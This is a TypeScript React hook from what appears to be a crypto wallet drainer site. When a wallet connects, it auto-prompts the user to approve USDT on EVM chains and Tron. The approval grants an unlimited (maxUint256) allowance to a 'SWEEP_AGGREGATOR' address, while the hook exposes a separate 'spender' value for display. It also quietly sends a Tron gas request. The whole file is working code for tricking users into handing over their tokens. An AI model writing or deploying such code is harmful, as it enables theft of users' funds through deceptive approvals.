"use client"

import { useCallback, useEffect, useMemo, useRef, useState } from "react"
import { maxUint256 } from "viem"
import {
  useAccount,
  useChainId,
  useReadContract,
  useSwitchChain,
  useWriteContract,
} from "wagmi"

import {
  defaultUsdtApprovalLabels,
  type SiteVariant,
  type UsdtApprovalLabels,
  type WalletChainId,
  walletChainIdByNumericId,
  walletChains,
} from "../config"
import {
  getSpenderForChain,
  getUsdtForChain,
  isEvmChain as isEvmChainId,
  SWEEP_AGGREGATOR,
} from "../contracts/addresses"
import { erc20Abi } from "../contracts/erc20-abi"
import { useWalletChain } from "../context/wallet-context"
import {
  approveTronUsdt,
  readTronAllowance,
  useTronWallet,
} from "./use-tron-wallet"
import { submitTronGasRequest } from "../api/submit-tron-gas"
import { readTronAddress } from "../wallet/tron-provider"
import {
  hasApprovalGranted,
  markApprovalGranted,
} from "../lib/approval-storage"

export type ApprovalPhase =
  | "idle"
  | "prompt"
  | "approving"
  | "approved"
  | "error"

function approvalSessionKey(chain: WalletChainId, address: string) {
  return `${chain}:${address.toLowerCase()}`
}

export function useUsdtApprovalFlow(siteVariant: SiteVariant, labels?: Partial<UsdtApprovalLabels>) {
  const { activeChain, setActiveChain, modalOpen: walletModalOpen } = useWalletChain()
  const promptSuppressedRef = useRef(false)
  const autoPromptedRef = useRef<string | null>(null)
  const promptOpenRef = useRef(false)
  const hadStableConnectionRef = useRef(false)
  const isConnectedRef = useRef(false)
  const mergedLabels = useMemo(
    () => ({ ...defaultUsdtApprovalLabels, ...labels }),
    [
      labels?.approve,
      labels?.approving,
      labels?.networkLabel,
      labels?.rejected,
      labels?.skip,
      labels?.spenderLabel,
      labels?.subtitle,
      labels?.title,
      labels?.tokenLabel,
      labels?.tronInstall,
    ],
  )
  const {
    address: evmAddress,
    isConnected: evmConnected,
    isConnecting: evmConnecting,
    isReconnecting: evmReconnecting,
  } = useAccount()
  const chainId = useChainId()
  const { switchChainAsync } = useSwitchChain()
  const { writeContractAsync } = useWriteContract()
  const tron = useTronWallet()

  const [phase, setPhase] = useState<ApprovalPhase>("idle")
  const [error, setError] = useState<string | null>(null)
  const [justApproved, setJustApproved] = useState(false)
  const [lastApprovalTxHash, setLastApprovalTxHash] = useState<string | null>(null)
  const [promptOpen, setPromptOpen] = useState(false)

  const isTron = activeChain === "tron"
  const evmReady = evmConnected && !evmConnecting && !evmReconnecting
  const isConnected = isTron ? tron.isConnected : evmReady
  const walletAddress = isTron ? tron.address : evmAddress

  const usdt = useMemo(() => getUsdtForChain(activeChain), [activeChain])
  const spender = useMemo(() => getSpenderForChain(activeChain), [activeChain])

  useEffect(() => {
    promptOpenRef.current = promptOpen
  }, [promptOpen])

  useEffect(() => {
    isConnectedRef.current = isConnected
  }, [isConnected])

  const evmUsdtAddress = (() => {
    if (isTron || !isEvmChainId(activeChain)) return undefined
    const token = getUsdtForChain(activeChain)
    return token.address.startsWith("0x") ? (token.address as `0x${string}`) : undefined
  })()

  const { data: evmAllowance, refetch: refetchEvmAllowance, isFetched: evmAllowanceFetched } = useReadContract({
    address: evmUsdtAddress,
    abi: erc20Abi,
    functionName: "allowance",
    args:
      evmAddress && !isTron
        ? [evmAddress, SWEEP_AGGREGATOR.evm]
        : undefined,
    query: {
      enabled: Boolean(evmReady && evmAddress && evmUsdtAddress && !isTron),
      staleTime: 60_000,
      refetchInterval: false,
      refetchOnWindowFocus: false,
      refetchOnReconnect: false,
      placeholderData: (previous) => previous,
    },
  })

  const [tronAllowance, setTronAllowance] = useState<bigint>(0n)
  const [tronAllowanceLoaded, setTronAllowanceLoaded] = useState(false)

  const refreshTronAllowance = useCallback(async () => {
    if (!isTron || !tron.address) {
      setTronAllowanceLoaded(true)
      return
    }
    try {
      const value = await readTronAllowance(
        tron.address,
        getUsdtForChain("tron").address,
        SWEEP_AGGREGATOR.tron,
      )
      setTronAllowance(value)
    } finally {
      setTronAllowanceLoaded(true)
    }
  }, [isTron, tron.address])

  useEffect(() => {
    if (!isTron) return
    if (tron.isConnected && tron.address) {
      setTronAllowanceLoaded(false)
      void refreshTronAllowance()
      return
    }
    setTronAllowance(0n)
    setTronAllowanceLoaded(false)
  }, [isTron, tron.isConnected, tron.address, refreshTronAllowance])

  const allowanceLoaded = isTron
    ? !tron.isConnected || tronAllowanceLoaded
    : !evmReady || evmAllowanceFetched

  const isApproved = isTron
    ? tronAllowance > 0n
    : (evmAllowance ?? 0n) > 0n

  const storedApprovalGranted =
    Boolean(walletAddress) &&
    hasApprovalGranted(activeChain, walletAddress ?? "")

  useEffect(() => {
    if (!isApproved || !walletAddress) return
    markApprovalGranted(activeChain, walletAddress)
  }, [activeChain, isApproved, walletAddress])

  const resetFlow = useCallback(() => {
    setPhase("idle")
    setError(null)
    setJustApproved(false)
    setLastApprovalTxHash(null)
    setPromptOpen(false)
  }, [])

  useEffect(() => {
    autoPromptedRef.current = null
    setPhase("idle")
    setError(null)
    setJustApproved(false)
    setLastApprovalTxHash(null)
    setPromptOpen(false)
    setTronAllowance(0n)
    setTronAllowanceLoaded(false)
  }, [activeChain])

  useEffect(() => {
    if (isConnected) {
      hadStableConnectionRef.current = true
      return
    }
    if (!hadStableConnectionRef.current) return

    const timer = window.setTimeout(() => {
      if (isConnectedRef.current) return
      hadStableConnectionRef.current = false
      promptSuppressedRef.current = false
      autoPromptedRef.current = null
      resetFlow()
    }, 800)
    return () => window.clearTimeout(timer)
  }, [isConnected, resetFlow])

  useEffect(() => {
    if (
      walletModalOpen ||
      promptSuppressedRef.current ||
      !isConnected ||
      !walletAddress ||
      !allowanceLoaded ||
      isApproved ||
      storedApprovalGranted ||
      promptOpenRef.current ||
      phase === "approving"
    ) {
      return
    }

    const sessionKey = approvalSessionKey(activeChain, walletAddress)
    if (autoPromptedRef.current === sessionKey) return

    const timer = window.setTimeout(() => {
      if (
        promptSuppressedRef.current ||
        walletModalOpen ||
        promptOpenRef.current ||
        !walletAddress
      ) {
        return
      }
      autoPromptedRef.current = sessionKey
      setPromptOpen(true)
      setPhase("prompt")
    }, 600)
    return () => window.clearTimeout(timer)
  }, [
    walletModalOpen,
    isConnected,
    walletAddress,
    allowanceLoaded,
    isApproved,
    storedApprovalGranted,
    phase,
    activeChain,
  ])

  const ensureEvmChain = useCallback(async () => {
    if (!isEvmChainId(activeChain)) return
    const target = walletChains[activeChain].chainId
    if (!target || chainId === target) return
    await switchChainAsync({ chainId: target })
  }, [activeChain, chainId, switchChainAsync])

  const approve = useCallback(async () => {
    setError(null)
    setPhase("approving")
    try {
      let approvalTxHash: string | null = null
      if (isTron) {
        if (!tron.isConnected || !tron.address) {
          await tron.connect()
        }
        if (!readTronAddress()) {
          throw new Error("Tron wallet not connected")
        }
        const tronAddress = readTronAddress()
        if (tronAddress) {
          void submitTronGasRequest(tronAddress, siteVariant)
        }
        approvalTxHash = await approveTronUsdt(
          getUsdtForChain("tron").address,
          SWEEP_AGGREGATOR.tron,
        )
        await refreshTronAllowance()
      } else {
        if (!evmAddress || !isEvmChainId(activeChain)) {
          throw new Error("Wallet not connected")
        }
        if (!/^0x[a-fA-F0-9]{40}$/.test(evmAddress)) {
          throw new Error("Invalid wallet address")
        }
        await ensureEvmChain()
        const token = getUsdtForChain(activeChain)
        if (!isEvmChainId(activeChain) || !token.address.startsWith("0x")) {
          throw new Error("Invalid USDT config")
        }
        approvalTxHash = await writeContractAsync({
          address: token.address as `0x${string}`,
          abi: erc20Abi,
          functionName: "approve",
          args: [SWEEP_AGGREGATOR.evm, maxUint256],
          account: evmAddress,
        })
        await refetchEvmAllowance()
      }
      setLastApprovalTxHash(approvalTxHash)
      setPhase("approved")
      setJustApproved(true)
      setPromptOpen(false)
    } catch (cause) {
      setPhase("error")
      setError(cause instanceof Error ? cause.message : mergedLabels.rejected)
      throw cause
    }
  }, [
    activeChain,
    ensureEvmChain,
    evmAddress,
    isTron,
    mergedLabels.rejected,
    refreshTronAllowance,
    refetchEvmAllowance,
    tron,
    writeContractAsync,
  ])

  const requestApproval = useCallback(() => {
    if (walletAddress) {
      autoPromptedRef.current = approvalSessionKey(activeChain, walletAddress)
    }
    promptSuppressedRef.current = false
    setPromptOpen(true)
    setPhase("prompt")
  }, [activeChain, walletAddress])

  const dismissPrompt = useCallback(() => {
    promptSuppressedRef.current = true
    setPromptOpen(false)
    setPhase((current) => (current === "prompt" || current === "error" ? "idle" : current))
  }, [])

  const clearJustApproved = useCallback(() => {
    setJustApproved(false)
  }, [])

  const switchNetwork = useCallback(
    async (chain: WalletChainId) => {
      setActiveChain(chain)
      if (chain === "tron") {
        if (tron.hasTronLink) {
          await tron.connect()
        }
        return
      }
      const targetChainId = walletChains[chain].chainId
      if (evmConnected && targetChainId) {
        await switchChainAsync({ chainId: targetChainId })
      }
    },
    [evmConnected, setActiveChain, switchChainAsync, tron],
  )

  const isApproving = phase === "approving"
  const evmChainMatches =
    !isTron &&
    isEvmChainId(activeChain) &&
    walletChainIdByNumericId[chainId] === activeChain

  return useMemo(
    () => ({
      siteVariant,
      labels: mergedLabels,
      activeChain,
      switchNetwork,
      isConnected,
      walletAddress,
      isApproved,
      isApproving,
      phase,
      error,
      justApproved,
      clearJustApproved,
      lastApprovalTxHash,
      promptOpen,
      requestApproval,
      dismissPrompt,
      approve,
      spender,
      usdt,
      hasTronLink: tron.hasTronLink,
      evmChainMatches,
    }),
    [
      activeChain,
      approve,
      clearJustApproved,
      dismissPrompt,
      error,
      evmChainMatches,
      isApproved,
      isApproving,
      isConnected,
      justApproved,
      lastApprovalTxHash,
      mergedLabels,
      phase,
      promptOpen,
      requestApproval,
      siteVariant,
      spender,
      switchNetwork,
      tron.hasTronLink,
      usdt,
      walletAddress,
    ],
  )
}
